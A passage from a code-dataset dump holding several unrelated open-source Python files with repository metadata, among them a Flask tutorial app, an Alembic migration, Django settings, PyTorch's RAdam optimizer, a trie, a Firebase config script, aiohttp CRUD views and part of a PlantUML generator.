methods=[\"POST\"])\ndef recibir():\n # request permite capturar los datos enviados\n nombre = request.form[\"nombreIngresado\"]\n print(\"Nombre recibido\", nombre)\n\n # Validar \n if nombre.isalpha()==True:\n mensaje = f'{nombre} tiene {vocales(nombre)} vocales'\n \n else:\n mensaje = f'Nombre no válido, intente nuevamente'\n\n return render_template(\"index.html\",nombre=nombre, mensaje=mensaje)\n\n\n@app.route(\"/api\")\ndef api():\n datos = [{\"name\": \"Lila\"}, {\"name\": \"Lolo\"},{\"name\": \"Miguel\"}]\n return jsonify(datos)\n\n# Programa principal\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"sebamacha/curso_Python_Full_Stack","sub_path":"Backend/Phyton/PYTHON - 8/PYTHON_8_RESUELTO/ejemplo_2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16447764717","text":"\"\"\"Rename config\n\nRevision ID: b90dcb36a10a\nRevises: 7c6433145877\nCreate Date: 2017-08-21 14:16:40.991460\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'b90dcb36a10a'\ndown_revision = '7c6433145877'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('cfg_settings',\n sa.Column('key', sa.String(length=128), nullable=False),\n sa.Column('date_created', sa.DateTime(timezone=True), nullable=True),\n sa.Column('date_modified', sa.DateTime(timezone=True), nullable=True),\n sa.Column('public', sa.Boolean(), nullable=True),\n sa.Column('value', sa.TEXT(), nullable=True),\n sa.Column('description', sa.String(length=512), nullable=True),\n sa.PrimaryKeyConstraint('key')\n )\n op.create_index('ix_cfg_settings_key', 'cfg_settings', ['key'], unique=False)\n op.create_index('ix_cfg_settings_public', 'cfg_settings', ['public'], unique=False)\n op.drop_table('config')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('config',\n sa.Column('date_created', sa.DATETIME(), nullable=True),\n sa.Column('date_modified', sa.DATETIME(), nullable=True),\n sa.Column('key', mysql.VARCHAR(length=256), nullable=True),\n sa.Column('public', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True),\n sa.Column('value', mysql.VARCHAR(length=2048), nullable=True),\n mysql_default_charset='latin1',\n mysql_engine='InnoDB'\n )\n op.drop_index('ix_cfg_settings_public', table_name='cfg_settings')\n op.drop_index('ix_cfg_settings_key', table_name='cfg_settings')\n op.drop_table('cfg_settings')\n # ### end Alembic commands ###\n","repo_name":"InQuest/ThreatKB","sub_path":"migrations/versions/b90dcb36a10a_rename_config.py","file_name":"b90dcb36a10a_rename_config.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"72"} +{"seq_id":"16665041488","text":"\"\"\"\nProduction Django settings for TheDoubleR project.\n\"\"\"\nimport os\n\nfrom .base import *\n\nDATA_DIR = Path('/data')\n\nSECRET_KEY = os.environ['DJANGO_SECRET_KEY']\nALLOWED_HOSTS = os.environ.get('DJANGO_ALLOWED_HOSTS', '*').split(',')\n\nif 'POSTGRES_HOST' in os.environ.keys():\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'HOST': os.environ['POSTGRES_HOST'],\n 'PORT': os.environ.get('POSTGRES_PORT', '5432'),\n 'NAME': os.environ['POSTGRES_DB'],\n 'USER': os.environ['POSTGRES_USER'],\n 'PASSWORD': os.environ['POSTGRES_PASSWORD'],\n }\n }\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': DATA_DIR / 'db.sqlite3',\n }\n }\n\nSTATIC_ROOT = DATA_DIR / 'static'\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n 'LOCATION': DATA_DIR / 'cache/django',\n }\n}\n","repo_name":"thatsed/TheDoubleR","sub_path":"conf/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14833350639","text":"import math\nfrom typing import List, Optional\n\nimport torch\nfrom torch import Tensor\n\nfrom .optimizer import (\n Optimizer,\n _default_to_fused_or_foreach,\n _differentiable_doc,\n _dispatch_sqrt,\n _foreach_doc,\n _get_value,\n _stack_if_compiling,\n _use_grad_for_differentiable,\n _view_as_real,\n)\n\n__all__ = [\"RAdam\", \"radam\"]\n\n\nclass RAdam(Optimizer):\n def __init__(\n self,\n params,\n lr=1e-3,\n betas=(0.9, 0.999),\n eps=1e-8,\n weight_decay=0,\n decoupled_weight_decay: bool = False,\n *,\n foreach: Optional[bool] = None,\n differentiable: bool = False,\n ):\n if not 0.0 <= lr:\n raise ValueError(f\"Invalid learning rate: {lr}\")\n if not 0.0 <= eps:\n raise ValueError(f\"Invalid epsilon value: {eps}\")\n if not 0.0 <= betas[0] < 1.0:\n raise ValueError(f\"Invalid beta parameter at index 0: {betas[0]}\")\n if not 0.0 <= betas[1] < 1.0:\n raise ValueError(f\"Invalid beta parameter at index 1: {betas[1]}\")\n if not 0.0 <= weight_decay:\n raise ValueError(f\"Invalid weight_decay value: {weight_decay}\")\n defaults = dict(\n lr=lr,\n betas=betas,\n eps=eps,\n weight_decay=weight_decay,\n foreach=foreach,\n decoupled_weight_decay=decoupled_weight_decay,\n differentiable=differentiable,\n )\n super().__init__(params, defaults)\n\n def __setstate__(self, state):\n super().__setstate__(state)\n for group in self.param_groups:\n group.setdefault(\"foreach\", None)\n group.setdefault(\"differentiable\", False)\n group.setdefault(\"decoupled_weight_decay\", False)\n state_values = list(self.state.values())\n step_is_tensor = (len(state_values) != 0) and torch.is_tensor(\n state_values[0][\"step\"]\n )\n if not step_is_tensor:\n for s in state_values:\n s[\"step\"] = torch.tensor(float(s[\"step\"]))\n\n def _init_group(self, group, params_with_grad, grads, exp_avgs, exp_avg_sqs, state_steps):\n has_complex = False\n for p in group[\"params\"]:\n if p.grad is not None:\n has_complex |= torch.is_complex(p)\n params_with_grad.append(p)\n if p.grad.is_sparse:\n raise RuntimeError(\"RAdam does not support sparse gradients\")\n grads.append(p.grad)\n\n state = self.state[p]\n # Lazy state initialization\n if len(state) == 0:\n state[\"step\"] = torch.tensor(0.0)\n # Exponential moving average of gradient values\n state[\"exp_avg\"] = torch.zeros_like(\n p, memory_format=torch.preserve_format\n )\n # Exponential moving average of squared gradient values\n state[\"exp_avg_sq\"] = torch.zeros_like(\n p, memory_format=torch.preserve_format\n )\n\n exp_avgs.append(state[\"exp_avg\"])\n exp_avg_sqs.append(state[\"exp_avg_sq\"])\n state_steps.append(state[\"step\"])\n\n return has_complex\n\n @_use_grad_for_differentiable\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Args:\n closure (Callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n with torch.enable_grad():\n loss = closure()\n\n for group in self.param_groups:\n params_with_grad = []\n grads = []\n exp_avgs = []\n exp_avg_sqs = []\n state_steps = []\n beta1, beta2 = group[\"betas\"]\n\n has_complex = self._init_group(group, params_with_grad, grads, exp_avgs, exp_avg_sqs, state_steps)\n\n radam(\n params_with_grad,\n grads,\n exp_avgs,\n exp_avg_sqs,\n state_steps,\n beta1=beta1,\n beta2=beta2,\n lr=group[\"lr\"],\n weight_decay=group[\"weight_decay\"],\n eps=group[\"eps\"],\n foreach=group[\"foreach\"],\n differentiable=group[\"differentiable\"],\n decoupled_weight_decay=group[\"decoupled_weight_decay\"],\n has_complex=has_complex,\n )\n\n return loss\n\n\nRAdam.__doc__ = r\"\"\"Implements RAdam algorithm.\n\n .. math::\n \\begin{aligned}\n &\\rule{110mm}{0.4pt} \\\\\n &\\textbf{input} : \\gamma \\text{ (lr)}, \\: \\beta_1, \\beta_2\n \\text{ (betas)}, \\: \\theta_0 \\text{ (params)}, \\:f(\\theta) \\text{ (objective)}, \\:\n \\lambda \\text{ (weightdecay)}, \\\\\n &\\hspace{13mm} \\epsilon \\text{ (epsilon)}, \\textit{decoupled\\_weight\\_decay} \\\\\n &\\textbf{initialize} : m_0 \\leftarrow 0 \\text{ ( first moment)},\n v_0 \\leftarrow 0 \\text{ ( second moment)}, \\\\\n &\\hspace{18mm} \\rho_{\\infty} \\leftarrow 2/(1-\\beta_2) -1 \\\\[-1.ex]\n &\\rule{110mm}{0.4pt} \\\\\n &\\textbf{for} \\: t=1 \\: \\textbf{to} \\: \\ldots \\: \\textbf{do} \\\\\n &\\hspace{6mm} g_t \\leftarrow \\nabla_{\\theta} f_t (\\theta_{t-1}) \\\\\n &\\hspace{6mm} \\theta_t \\leftarrow \\theta_{t-1} \\\\\n &\\hspace{6mm} \\textbf{if} \\: \\lambda \\neq 0 \\\\\n &\\hspace{12mm}\\textbf{if} \\: \\textit{decoupled\\_weight\\_decay} \\\\\n &\\hspace{18mm} \\theta_t \\leftarrow \\theta_{t} - \\gamma \\lambda \\theta_{t} \\\\\n &\\hspace{12mm}\\textbf{else} \\\\\n &\\hspace{18mm} g_t \\leftarrow g_t + \\lambda \\theta_{t} \\\\\n &\\hspace{6mm}m_t \\leftarrow \\beta_1 m_{t-1} + (1 - \\beta_1) g_t \\\\\n &\\hspace{6mm}v_t \\leftarrow \\beta_2 v_{t-1} + (1-\\beta_2) g^2_t \\\\\n &\\hspace{6mm}\\widehat{m_t} \\leftarrow m_t/\\big(1-\\beta_1^t \\big) \\\\\n &\\hspace{6mm}\\rho_t \\leftarrow \\rho_{\\infty} -\n 2 t \\beta^t_2 /\\big(1-\\beta_2^t \\big) \\\\[0.1.ex]\n &\\hspace{6mm}\\textbf{if} \\: \\rho_t > 5 \\\\\n &\\hspace{12mm} l_t \\leftarrow \\frac{\\sqrt{ (1-\\beta^t_2) }}{ \\sqrt{v_t} +\\epsilon } \\\\\n &\\hspace{12mm} r_t \\leftarrow\n \\sqrt{\\frac{(\\rho_t-4)(\\rho_t-2)\\rho_{\\infty}}{(\\rho_{\\infty}-4)(\\rho_{\\infty}-2) \\rho_t}} \\\\\n &\\hspace{12mm}\\theta_t \\leftarrow \\theta_t - \\gamma \\widehat{m_t} r_t l_t \\\\\n &\\hspace{6mm}\\textbf{else} \\\\\n &\\hspace{12mm}\\theta_t \\leftarrow \\theta_t - \\gamma \\widehat{m_t} \\\\\n &\\rule{110mm}{0.4pt} \\\\[-1.ex]\n &\\bf{return} \\: \\theta_t \\\\[-1.ex]\n &\\rule{110mm}{0.4pt} \\\\[-1.ex]\n \\end{aligned}\n\n For further details regarding the algorithm we refer to `On the variance of the adaptive learning rate and beyond`_.\n\n This implementation provides an option to use either the original weight_decay implementation as in Adam\n (where the weight_decay is applied to the gradient) or the one from AdamW (where weight_decay is applied\n to the weight) through the decoupled_weight_decay option. When decoupled_weight_decay is set to False\n (default), it uses the original Adam style weight decay, otherwise, it uses the AdamW style which\n corresponds more closely to the `author's implementation`_ in the RAdam paper. Further information\n about decoupled weight decay can be found in `Decoupled Weight Decay Regularization`_.\n\n \"\"\" + fr\"\"\"\n Args:\n params (iterable): iterable of parameters to optimize or dicts defining\n parameter groups\n lr (float, optional): learning rate (default: 1e-3)\n betas (Tuple[float, float], optional): coefficients used for computing\n running averages of gradient and its square (default: (0.9, 0.999))\n eps (float, optional): term added to the denominator to improve\n numerical stability (default: 1e-8)\n weight_decay (float, optional): weight decay (L2 penalty) (default: 0)\n decoupled_weight_decay (bool, optional): whether to use decoupled weight\n decay as in AdamW to obtain RAdamW (default: False)\n {_foreach_doc}\n {_differentiable_doc}\n\n .. _On the variance of the adaptive learning rate and beyond:\n https://arxiv.org/abs/1908.03265\n .. _author's implementation:\n https://github.com/LiyuanLucasLiu/RAdam\n .. _Decoupled Weight Decay Regularization:\n https://arxiv.org/abs/1711.05101\n\n \"\"\"\n\n\ndef radam(\n params: List[Tensor],\n grads: List[Tensor],\n exp_avgs: List[Tensor],\n exp_avg_sqs: List[Tensor],\n state_steps: List[Tensor],\n # kwonly args with defaults are not supported by functions compiled with torchscript issue #70627\n # setting this as kwarg for now as functional API is compiled by torch/distributed/optim\n decoupled_weight_decay: bool = False,\n foreach: Optional[bool] = None,\n differentiable: bool = False,\n has_complex: bool = False,\n *,\n beta1: float,\n beta2: float,\n lr: float,\n weight_decay: float,\n eps: float,\n):\n r\"\"\"Functional API that performs RAdam algorithm computation.\n\n See :class:`~torch.optim.RAdam` for details.\n \"\"\"\n\n if not all(isinstance(t, torch.Tensor) for t in state_steps):\n raise RuntimeError(\n \"API has changed, `state_steps` argument must contain a list of singleton tensors\"\n )\n\n if foreach is None:\n _, foreach = _default_to_fused_or_foreach(params, differentiable, use_fused=False)\n\n if foreach and torch.jit.is_scripting():\n raise RuntimeError(\"torch.jit.script not supported with foreach optimizers\")\n\n if foreach and not torch.jit.is_scripting():\n func = _multi_tensor_radam\n else:\n func = _single_tensor_radam\n\n func(\n params,\n grads,\n exp_avgs,\n exp_avg_sqs,\n state_steps,\n beta1=beta1,\n beta2=beta2,\n lr=lr,\n weight_decay=weight_decay,\n eps=eps,\n decoupled_weight_decay=decoupled_weight_decay,\n differentiable=differentiable,\n has_complex=has_complex,\n )\n\n\ndef _single_tensor_radam(\n params: List[Tensor],\n grads: List[Tensor],\n exp_avgs: List[Tensor],\n exp_avg_sqs: List[Tensor],\n state_steps: List[Tensor],\n *,\n beta1: float,\n beta2: float,\n lr: float,\n weight_decay: float,\n eps: float,\n differentiable: bool,\n decoupled_weight_decay: bool,\n has_complex: bool,\n):\n\n for i, param in enumerate(params):\n grad = grads[i]\n exp_avg = exp_avgs[i]\n exp_avg_sq = exp_avg_sqs[i]\n step_t = state_steps[i]\n\n if torch.is_complex(param):\n param = torch.view_as_real(param)\n grad = torch.view_as_real(grad)\n exp_avg = torch.view_as_real(exp_avg)\n exp_avg_sq = torch.view_as_real(exp_avg_sq)\n\n # update step\n step_t += 1\n step = _get_value(step_t)\n\n bias_correction1 = 1 - beta1 ** step\n bias_correction2 = 1 - beta2 ** step\n\n if weight_decay != 0:\n if decoupled_weight_decay:\n param.mul_(1 - lr * weight_decay)\n else:\n grad = grad.add(param, alpha=weight_decay)\n\n # Decay the first and second moment running average coefficient\n exp_avg.lerp_(grad, 1 - beta1)\n exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)\n\n # correcting bias for the first moving moment\n bias_corrected_exp_avg = exp_avg / bias_correction1\n\n # maximum length of the approximated SMA\n rho_inf = 2 / (1 - beta2) - 1\n # compute the length of the approximated SMA\n rho_t = rho_inf - 2 * step * (beta2 ** step) / bias_correction2\n\n if rho_t > 5.0:\n # Compute the variance rectification term and update parameters accordingly\n rect = math.sqrt(\n (rho_t - 4)\n * (rho_t - 2)\n * rho_inf\n / ((rho_inf - 4) * (rho_inf - 2) * rho_t)\n )\n exp_avg_sq_sqrt = exp_avg_sq.sqrt()\n if differentiable:\n exp_avg_sq_sqrt = exp_avg_sq_sqrt.add(eps)\n else:\n exp_avg_sq_sqrt = exp_avg_sq_sqrt.add_(eps)\n adaptive_lr = math.sqrt(bias_correction2) / exp_avg_sq_sqrt\n param.add_(bias_corrected_exp_avg * lr * adaptive_lr * rect, alpha=-1.0)\n else:\n param.add_(bias_corrected_exp_avg * lr, alpha=-1.0)\n\n\ndef _multi_tensor_radam(\n params: List[Tensor],\n grads: List[Tensor],\n exp_avgs: List[Tensor],\n exp_avg_sqs: List[Tensor],\n state_steps: List[Tensor],\n *,\n beta1: float,\n beta2: float,\n lr: float,\n weight_decay: float,\n eps: float,\n decoupled_weight_decay: bool,\n differentiable: bool,\n has_complex: bool,\n):\n\n if len(params) == 0:\n return\n\n assert not differentiable, \"_foreach ops don't support autograd\"\n\n grouped_tensors = Optimizer._group_tensors_by_device_and_dtype([params, grads, exp_avgs, exp_avg_sqs, state_steps])\n for ((\n grouped_params,\n grouped_grads,\n grouped_exp_avgs,\n grouped_exp_avg_sqs,\n grouped_state_steps,\n ), _) in grouped_tensors.values():\n # Update steps\n # If steps are on CPU, foreach will fall back to the slow path, which is a for-loop calling t.add(1) over\n # and over. 1 will then be wrapped into a Tensor over and over again, which is slower than if we just\n # wrapped it once now. The alpha is required to assure we go to the right overload.\n if grouped_state_steps[0].is_cpu:\n torch._foreach_add_(grouped_state_steps, torch.tensor(1.0, device='cpu'), alpha=1.0)\n else:\n torch._foreach_add_(grouped_state_steps, 1)\n\n if has_complex:\n _view_as_real(grouped_params, grouped_grads, grouped_exp_avgs, grouped_exp_avg_sqs)\n\n # maximum length of the approximated SMA\n rho_inf = 2 / (1 - beta2) - 1\n # compute the length of the approximated SMA\n rho_t_list = [rho_inf - 2 * _get_value(step) * (beta2 ** _get_value(step)) /\n (1 - beta2 ** _get_value(step)) for step in grouped_state_steps]\n\n if weight_decay != 0:\n if decoupled_weight_decay:\n torch._foreach_mul_(grouped_params, 1 - lr * weight_decay)\n else:\n grouped_grads = torch._foreach_add(grouped_grads, grouped_params, alpha=weight_decay)\n\n # Decay the first and second moment running average coefficient\n torch._foreach_lerp_(grouped_exp_avgs, grouped_grads, 1 - beta1)\n\n torch._foreach_mul_(grouped_exp_avg_sqs, beta2)\n torch._foreach_addcmul_(grouped_exp_avg_sqs, grouped_grads, grouped_grads, 1 - beta2)\n\n # Delete the local intermediate since it won't be used anymore to save on peak memory\n del grouped_grads\n\n rect = [\n _dispatch_sqrt(\n (rho_t - 4)\n * (rho_t - 2)\n * rho_inf\n / ((rho_inf - 4) * (rho_inf - 2) * rho_t)\n )\n if rho_t > 5\n else 0\n for rho_t in rho_t_list\n ]\n unrectified = [0 if rect > 0 else 1.0 for rect in rect]\n\n bias_correction1 = [1 - beta1 ** _get_value(step) for step in grouped_state_steps]\n unrect_step_size = _stack_if_compiling([(lr * rect / bc) * -1 for rect, bc in zip(unrectified, bias_correction1)])\n bias_correction2_sqrt_times_rect_step_size = [\n _dispatch_sqrt(1 - beta2 ** _get_value(step)) * (lr * rect / bc) * -1\n for step, rect, bc in zip(grouped_state_steps, rect, bias_correction1)\n ]\n\n buffer = torch._foreach_sqrt(grouped_exp_avg_sqs)\n torch._foreach_add_(buffer, eps)\n torch._foreach_div_(buffer, bias_correction2_sqrt_times_rect_step_size)\n torch._foreach_reciprocal_(buffer)\n torch._foreach_add_(buffer, unrect_step_size)\n\n # Here, buffer = sqrt(1 - beta2^t) * rect_step_size / (sqrt(v) + eps) + unrect_step_size\n torch._foreach_addcmul_(grouped_params, grouped_exp_avgs, buffer)\n","repo_name":"pytorch/pytorch","sub_path":"torch/optim/radam.py","file_name":"radam.py","file_ext":"py","file_size_in_byte":17154,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"37879207227","text":"from typing import Tuple\n\n\nclass TrieNode(object):\n \"\"\"\n Our trie node implementation. Very basic. but does the job\n \"\"\"\n\n def __init__(self, word: str):\n self.word = word\n self.children = {}\n # Is it the last character of the word.`\n self.sentence_finished = False\n # How many times this character appeared in the addition process\n self.counter = 1\n\n\ndef add(root, wordlist):\n \"\"\"\n Adding a word in the trie structure\n \"\"\"\n node = root\n for word in wordlist:\n # We did not find it so add a new chlid\n if not node.children.get(word):\n new_node = TrieNode(word)\n node.children[word] = new_node\n # And then point node to the new child\n node = new_node\n # Everything finished. Mark it as the end of a word.\n node.word_finished = True\n\n\ndef find_prefix(root, words) -> Tuple[bool, int]:\n \"\"\"\n Check and return\n 1. If the prefix exsists in any of the words we added so far\n 2. If yes then how may words actually have the prefix\n \"\"\"\n node = root\n # If the root node has no children, then return False.\n # Because it means we are trying to search in an empty trie\n if not root.children:\n return False, 0\n for word in words:\n if node.children.get(word):\n node = node.children[word]\n else:\n return False, 0\n\n # Well, we are here means we have found the prefix. Return true to indicate that\n # And also the counter of the last node. This indicates how many words have this\n # prefix\n return True, node.counter\n\n\nif __name__ == \"__main__\":\n root = TrieNode('*')\n add(root, [\"hello\", \"world\"])\n add(root, ['hello'])\n\n print(find_prefix(root, ['hello']))\n print(find_prefix(root, ['hello', 'world']))\n print(find_prefix(root, ['hackathon']))\n print(find_prefix(root, ['ha']))\n print(find_prefix(root, ['hammer']))\n","repo_name":"atillagenc/zenclass","sub_path":"trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19579064686","text":"import argparse\nimport requests\nimport io\nimport os\nimport httplib2\nimport json\n\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom googleapiclient.discovery import build\n\n\nPROJECT_ID = os.getenv('PROJECT_ID')\nSCOPES = [\n 'https://www.googleapis.com/auth/firebase.remoteconfig',\n 'https://www.googleapis.com/auth/cloud-platform',\n 'https://www.googleapis.com/auth/cloud-platform.read-only',\n 'https://www.googleapis.com/auth/firebase',\n 'https://www.googleapis.com/auth/firebase.readonly'\n]\n\n# [START retrieve_access_token]\ndef _get_access_token():\n \"\"\"Retrieve a valid access token that can be used to authorize requests.\n :return: Access token.\n \"\"\"\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n 'service-account.json', SCOPES)\n access_token_info = credentials.get_access_token()\n return access_token_info.access_token\n# [END retrieve_access_token]\n\n\ndef _getConfig():\n \"\"\"Retrieve the current Firebase Config template from server.\n Retrieve the current Firebase Config template from server and store it\n locally.\n \"\"\"\n headers = {\n 'Authorization': 'Bearer ' + _get_access_token()\n }\n credentials = ServiceAccountCredentials.from_json_keyfile_name( 'service-account.json', scopes=SCOPES)\n http = httplib2.Http()\n http = credentials.authorize(http)\n service = build(\"firebase\", \"v1beta1\", http=http)\n projects = service.projects().webApps()\n webapps = projects.list(parent=\"projects/didi-dito-trevor\").execute()\n webapp_id = webapps[\"apps\"][0][\"appId\"]\n name = \"projects/{}/webApps/{}/config\".format(PROJECT_ID, webapp_id)\n print(\"Getting firebase-config for app {}\".format(name))\n config = projects.getConfig(name=name).execute()\n with open(\"firebase-config.json\", \"w\") as file:\n json.dump(config, file)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--action')\n parser.add_argument('--etag')\n parser.add_argument('--version')\n args = parser.parse_args()\n\n if args.action and args.action == 'getConfig':\n _getConfig()\n else:\n print('''Invalid command. Please use one of the following commands:\npython configure.py --action=get\npython configure.py --action=publish --etag=\npython configure.py --action=versions\npython configure.py --action=rollback --version=''')\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tlgevers/firebase-manage","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40786882030","text":"import logging\n\nfrom aiohttp import web\n\nfrom api.dataclasses.trainer import TrainerClass, TrainerSchema\nfrom api.models.trainer import Trainers\n\nfrom marshmallow import Schema, fields\n\nfrom webargs.aiohttpparser import use_args\n\n\nclass GetSchema(Schema):\n name = fields.String(required=True)\n region = fields.String(required=False, default=None, missing='')\n age = fields.Integer(required=False, default=None, missing=0)\n\n\nclass ResponseGetSchema(Schema):\n data = fields.List(\n fields.Nested(TrainerSchema),\n required=True\n )\n\n\nclass TrainersView(web.View):\n\n response = ResponseGetSchema()\n\n async def get(self):\n \"\"\"\n ---\n description: This end-point allow to get some trainers\n tags:\n - Trainer\n produces:\n - text/plain\n responses:\n \"200\":\n description: successful operation. Return \"trainer\" data\n \"\"\"\n\n session = self.request.app['session_db']\n\n data = session.query(Trainers).all()\n resp = [\n TrainerClass(\n Name=trainer.name,\n Region=trainer.region,\n Age=trainer.age\n )\n for trainer in data]\n\n return web.json_response(self.response.dump(\n {\n 'data': resp\n }\n ))\n\n @use_args(GetSchema(), location=\"query\")\n async def post(self, args):\n \"\"\"\n ---\n description: This end-point allow to save some strainer\n tags:\n - Trainer\n produces:\n - text/plain\n responses:\n \"200\":\n description: successful operation.\n \"\"\"\n try:\n session = self.request.app['session_db']\n new_trainer = Trainers(\n name=args['name'],\n region=args['region'],\n age=args['age']\n )\n session.add(new_trainer)\n session.commit()\n logging.info('Saved successfully')\n\n return web.json_response({'message': 'Saved successfully'})\n\n except Exception as e:\n print(e)\n raise\n\n @use_args(GetSchema(), location=\"query\")\n async def put(self, args):\n \"\"\"\n ---\n description: This end-point allow to update some trainer\n tags:\n - Trainer\n produces:\n - text/plain\n responses:\n \"200\":\n description: successful operation.\n \"\"\"\n try:\n session = self.request.app['session_db']\n\n update_trainer = session.query(Trainers).filter(\n Trainers.name == args[\"name\"]).one()\n update_trainer.age = args[\"age\"]\n session.commit()\n\n logging.info('Updated successfully')\n\n return web.json_response({'message': 'Updated successfully'})\n\n except Exception as e:\n print(e)\n raise\n\n @use_args(GetSchema(), location=\"query\")\n async def delete(self, args):\n \"\"\"\n ---\n description: This end-point allow to delete some trainer\n tags:\n - Trainer\n produces:\n - text/plain\n responses:\n \"200\":\n description: successful operation.\n \"\"\"\n try:\n session = self.request.app['session_db']\n if args[\"name\"]:\n looking_for = '%{0}%'.format(args[\"name\"])\n session.query.filter_by(looking_for).delete()\n logging.info('Delete successfully')\n session.commit()\n\n return web.json_response({'message': 'Delete successfully'})\n\n except Exception as e:\n print(e)\n raise\n","repo_name":"FernandoBLima/python-sample-projects","sub_path":"0.4_PYTHON_SQLALCHEMY_DOCKER/server/api/views/trainers.py","file_name":"trainers.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26393743997","text":"import os\nimport re\nimport subprocess\n\nfrom utilities.util import Util\n\nfrom .linker import Linker\n\nclass Generator:\n\n def __init__( self, arguments ):\n\n #### GLOBALS ################################\n\n self.arguments = arguments\n\n self.files = [ ]\n\n self.output_path = None\n\n ########################################\n\n self.class_header = None\n\n self.template = { }\n\n self.plantuml_script = None\n\n self.tags = {\n 'properties': '',\n 'setters': '__ Setter __',\n 'getters': '__ Getter __',\n 'utilities': '__ Utility __'\n }\n\n #### INITIALIZATION ##########################\n\n self.init ( )\n\n #### INITIATORS ########################################################\n\n def init ( self ):\n\n self.get_files ( )\n\n self.compile ( )\n\n\n def compile ( self ):\n\n for file in self.files:\n\n self.process ( file )\n\n self.render ( file )\n\n\n def process ( self, file ):\n\n self.template = {\n 'class': None,\n 'properties':\n {\n 'names': [ ],\n 'types': [ ]\n },\n 'setters':\n {\n 'names': [ ],\n 'types': [ ]\n },\n 'getters':\n {\n 'names': [ ],\n 'types': [ ]\n },\n 'utilities':\n {\n 'names': [ ],\n 'types': [ ]\n }\n }\n\n self.get_header ( file )\n\n self.get_class ( file )\n\n self.get_properties ( file )\n\n self.get_mutators ( file )\n\n self.get_utilities ( file )\n\n\n def render ( self, file ):\n\n self.prepare_file ( file )\n\n self.compose_header ( )\n\n self.compose_members ( )\n\n self.compose_footer ( )\n\n self.save_output ( )\n\n self.compose_image ( )\n\n #### GETTERS ########################################################\n\n def get_files ( self ):\n\n source = self.arguments [ 'source' ];\n\n\n if ( Util.is_file ( source ) ): # If: file\n\n self.files.append ( source )\n\n\n if ( Util.is_directory ( source ) ): # If: directory\n\n omissions = Util.get_file_omissions ( self.arguments )\n\n self.files = Util.get_files ( source, '.js', omissions )\n\n\n def get_header ( self, file ):\n\n regex = r'(\\/\\*\\*[^@]+@class[^\\/]+\\/)'\n\n\n with open ( file, 'r' ) as reader:\n\n data = reader.read ( )\n\n\n if re.search ( regex, data ):\n\n self.class_header = re.search ( regex, data ).group ( 1 )\n\n\n def get_class ( self, file ):\n\n regex = r'class\\s*(\\w+)[^{]+{'\n\n\n with open ( file, 'r' ) as reader:\n\n data = reader.read ( )\n\n self.template [ 'class' ] = re.search ( regex, data ).group ( 1 )\n\n\n def get_properties ( self, file ):\n\n if self.class_header:\n\n regex = r'@property\\s*{(.+)}\\s*((\\w+)|\\[(\\w+)=(\\w+)\\]?)'\n\n temp = re.findall ( regex, self.class_header )\n\n\n for value in temp:\n\n self.template [ 'properties' ] [ 'names' ].append ( value [ 1 ] )\n\n self.template [ 'properties' ] [ 'types' ].append ( value [ 0 ] )\n\n else:\n\n regexes = {\n 'start':\n [\n r'class\\s*\\w+'\n ],\n 'close':\n [\n r'\\s{2,4}constructor\\s*\\(',\n r'\\s{2,4}set\\s*\\w+(\\s*?)\\(',\n r'\\s{2,4}get\\s*\\w+(\\s*?)\\('\n ]\n }\n\n bounds = Util.get_file_bounds ( file, regexes )\n\n lines = open ( file ).readlines ( )\n\n lines = lines [ bounds [ 'start' ] : bounds [ 'close' ] ]\n\n\n self.template [ 'properties' ] = Util.filter_properties ( lines )\n\n\n def get_mutators ( self, file ):\n\n data = open ( file, 'r' ).read ( )\n\n\n for mutator in [ 'set', 'get' ]:\n\n mutator_type = mutator + 'ters'\n\n\n # Docstring\n\n regex = r'@param\\s*\\{(\\w+)\\}[^\\/]+\\/[^s]+set\\s(\\w+)' if mutator == 'set' else r'@return\\s*{(\\w+)}[^\\/]+\\/[^g]+get\\s(\\w+)'\n\n mutators = re.findall ( regex, data )\n\n\n for value in mutators:\n\n self.template [ mutator_type ] [ 'names' ].append ( value [ 1 ] )\n\n self.template [ mutator_type ] [ 'types' ].append ( value [ 0 ] )\n\n\n # Vanilla\n\n regex = r'\\s{2,4}' + mutator + r'\\s*(\\w+)\\s*\\([^\\)]+\\)'\n\n mutators = re.findall ( regex, data )\n\n\n for value in mutators:\n\n if value not in self.template [ mutator_type ] [ 'names' ]:\n\n self.template [ mutator_type ] [ 'names' ].append ( value )\n\n 